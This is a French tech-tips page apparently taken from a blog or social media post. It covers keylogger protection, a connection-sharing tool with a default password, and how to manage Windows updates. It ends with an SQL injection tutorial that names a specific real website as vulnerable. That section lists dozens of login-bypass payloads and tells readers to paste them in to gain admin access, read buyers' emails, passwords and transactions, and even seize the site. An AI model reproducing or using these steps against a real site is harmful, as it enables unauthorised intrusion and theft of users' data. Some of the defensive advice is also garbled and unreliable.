Trucs et astuces-informatique

                                             Comment se protéger des keylogger.

Qu'appel t'on réellement keylogger ?


Un keylogger :

                        c'est tout simplement un dispositif d'espionnage informatique qui enregistre les suites de touches tapées sur un clavier.

On c'est à quel point il est facile pour les pirates de voir et d'enregistrer chaque touche que vous appuyez sur votre ordinateur. Quand un hacker a vue une porte dérobée inaperçue sur votre ordinateur, tout est possible, mais il ya quelques choses que vous pouvez faire pour minimiser le risque d'avoir vos clés capturé:

• Utiliser un logiciel antivirus. Bien qu'il n'y ait pas de solution fourre-tout et que les logiciels antivirus ne protègent pas contre les keyloggers sophistiqués et de pointe, il n'y a toujours aucune excuse pour ne pas utiliser les logiciels antivirus qui protègent contre les logiciels keylogger les plus connus, il existe une variété d'antivirus aujourd'hui dans le monde a savoir ( Avast, Esetnod32 , kapersky , malwarebytes anti-malware etc...).

• Pour entrer des mots de passe, utilisez des claviers à l'écran. ( Clavier virtuele) Une des limites de la plupart des keyloggers est qu'ils ne capturent que les touches réelles étant pressées sur le clavier. Le clavier Windows à l'écran fournira un clavier virtuel qui peut aider à contourner les keyloggers.   

•  Utilisez un pare-feu. Il est possible que les attaquants paresseux ne fassent pas l'effort de masquer leurs charges utiles pour apparaître comme étant des transmissions DNS (port 53) ou HTTP (port 80) normales. Un pare-feu peut attraper des paquets suspects en laissant votre ordinateur sur le port 35357.

• Pour protéger votre ordinateur contre les portes dérobées. Bien que tout ce qui précède soit utile lorsque vous êtes déjà réembauché, la meilleure chose à faire est de s'assurer que vous n'êtes pas exploité en premier lieu.

VCONNECT: Logiciel de partage de connexion

De nouveau dans le monde du HIGH-TECH nous vous pressentons un nouveau logiciel qui va permettre de partager la connexion de notre Ordinateur vers tout autre appareil et pour cela vous procedez comme suite:

• Installez VCONNECT
• Ouvrez en mode administrateur
• Saisir votre nom du WIFI et Mot de passe

NB: le mot de passe et nom d'utilisateur par defaut est : azerty123/Vconnect. vous pouvez changer et mettre les votre
lien de la video https://www.youtube.com/watch?v=agkTVQelrOo&t=3s

COMMENT ACTIVER, DÉSACTIVER ou SUPPRIMER LES MISES A JOURS WINDOWS

Ce tutoriel est pour vous montrer comment SUPPRIMER, ACTIVER ou DÉSACTIVER les mises à jours de WINDOWS. 

avant de vous montrer ces procédure nous allons vous parler de WINDOWS UPDATE alors ce service, nous permet de mettre à jours les composants du système d'exploitation Windows. Il peut être remplacé par Microsoft Update, qui inclut également des mises à jour de logiciels développés par Microsoft. Vous vous demandez surement comment il fonctionne alors pas d’inquiétude je vais vous expliquer.

Pour fonctionner Windows Update a besoin :

• Que l'accès aux sites sécurisés (HTTPs) soit fonctionnel, soit donc que le PC soit à l'heure, que les services Windows cryptographie soit démarrés. (NOTE : certains antivirus effectuant des analyses HTTPs peuvent provoquer des problèmes d'accès à Windows Update).
• Le service Windows BITS doit être démarré.
• Que le magasin des composants de Windows ne soit pas corrompu.

Microsoft fournit divers programmes pour réparer Windows Update comme Windows Update Troubleshooter, il existe aussi d'autres programmes non Microsoft comme Winupdatefix ou Windows Repair qui peuvent réparer les composants Windows Update.

Nous venons de parler de WINDOWS UPDATE et ce pendant nous allons d'abord vous donner les importances des MISES A JOURS car on ne peut pas de lever un matin et dire qu'on a plus besoin des MISES A JOURS de MICROSOFT.  Vous convenez avec moi que tous logiciels installés dans notre appareil à besoin des MISES A JOURS (MAJ) alors pourquoi ne pas passer de la version précédente à la suivante? pourquoi ne pas avoir nos logiciels à jours? je vous laisse à répondre à ces questions. Si on ne fait pas de MAJ ou on les remets à plus tard alors on risque de ne pas avoir une bonne sécurité de notre appareil. Dans notre cas il s'agit d'un Ordinateur qui tourne sous un système WINDOWS et si on n'autorise pas les MAJ alors on expose en quelques sorte notre PC car le PC ne sera plus sécurisé on peut perdre des données informatique. des logiciels peuvent causés des problèmes de compatibilité et les pirates peuvent hackers vos logiciels pourquoi ne pas toujours les mettres à jours? en effet il n'existe pas un logiciel qui n'a pas de MAJ ça non.

Bien, après avoir dis à quoi nous sert les MAJ nous allons maintenant voir comment les ACTIVER, SUPPRIMER ou DÉSACTIVER

• ACTIVER LES MISES A JOURS 

Pour activer ou les mises à jour automatiques de Windows, procédez comme suit:

1. Cliquez sur Démarrer, et puis cliquer sur Panneau de Configuration.
2. Dans le Panneau de Configuration double-cliquez sur l'icône Mise à Jour Windows.
3. Sélectionnez sur la gauche le lien, Modifier les Paramètres.
4. Sous Mises à Jour Importantes, sélectionnez l'option que vous voulez utiliser. 

• DÉSACTIVER LES MISES A JOURS 

Désactiver les mises à jour automatiques - Windows 7

1. Cliquez sur le bouton Démarrer.
2. Cliquez sur Tous les programmes puis sur Windows Update.
3. Dans le volet gauche de Windows Update, cliquez sur Modifier les paramètres.
4. Déroulez la liste Mises à jour importantes et sélectionnez l'option Ne jamais rechercher des mises à jour.
5. Validez par OK.

• SUPPRIMER LES MISES A JOURS

1. Ecrivez dans la barre de recherche « Afficher les mises à jour installées » et appuyez sur « Entrée ».
2. Sélectionner la mise à jour que vous voulez supprimer.
3. Cliquez sur désinstaller.
4. Suivez les instructions à l'écran pour terminer la désinstallation.

pour plus d'explication veillez cliquer ICI

Injection SQL

D'abord c'est quoi l'injection SQL ?

La faille SQLi, abréviation de SQL Injection, soit injection SQL en français, est un groupe de méthodes d'exploitation de faille de sécurité d'une application interagissant avec une base de données. Elle permet d'injecter dans la requête SQL en cours un morceau de requête non prévu par le système et pouvant en compromettre la sécurité.

Il existe plusieurs types d'injection SQL

Celles que nous allons Effectuer, est une Injection SQL très connue du Monde du Hacking, Il s'agit là de l'injection sur des failles des sites en ASP !
_______________________________________________________________________________

Sans toute fois perdre du temps on va commencer:
On va sur ce site  http://reap.com.pk qui est l'un des sites vulnérables. Je pouvais choisir un autre mais celui ci est vulnérable à 200 pour-cent 😂😂😂😂😂 et je vais contacter l'admin pour la sécurité du site.

Quand nous sommes dans le site, on essai de se connecter au site avec n'importe quel Identifiant ou Mdp et on voit qu'on a pas acces au compte et là c'est à nous de jouer.
Alors maintenant on va réessayer avec une petite Injection de txt dans la base de donnée pour passer utilisateur root/Admin du site.

Ligne à coper:

or 1=1
or 1=1—
or 1=1#
or 1=1/*
admin' —
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'—
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1—
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'—
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'—
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" —
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"—
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1—
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"—
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"—
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

copiez une ligne et collez ça dans Reap ID et dans Mot de passe : admin' or '1'='1. Maintenant tapez entrez et automatiquement vous serez connecter au site en tant qu'Admin et avec tout les droits , vous pourrez modifier les mots de passes , voir les autres user et leurs mots de passes etc
la vous etes Admin et vous pouvez consulter les transactions des acheteurs, obtenir leurs mails , leurs mots de passes etc
cette méthode est très simple
Vous pouvez meme vous approprier le site comme je vous connais, les sorciers peuvent meme changer de serveur mais je vous déconseille ca car je vais recuperer le site

NB: Cette méthode est une des méthodes que je proposerai dans ma formation  Complète  de SECURITE INFORMATIQUE de stage de VACANCE que j'ai lancé dans la ville de yde✅
Vous l'avez vu vous meme , elle est simple et efficace !

Il existe pleins d'autres méthodes pour Effectuer des Injections SQL , partagez la PAGE FACEBOOK au max et je ferai encore plus de tutos simple et complets biensure 🚩

Quand vous maîtriserez cette simple méthode vous serez capable de la reproduire en 5 Secondes 😁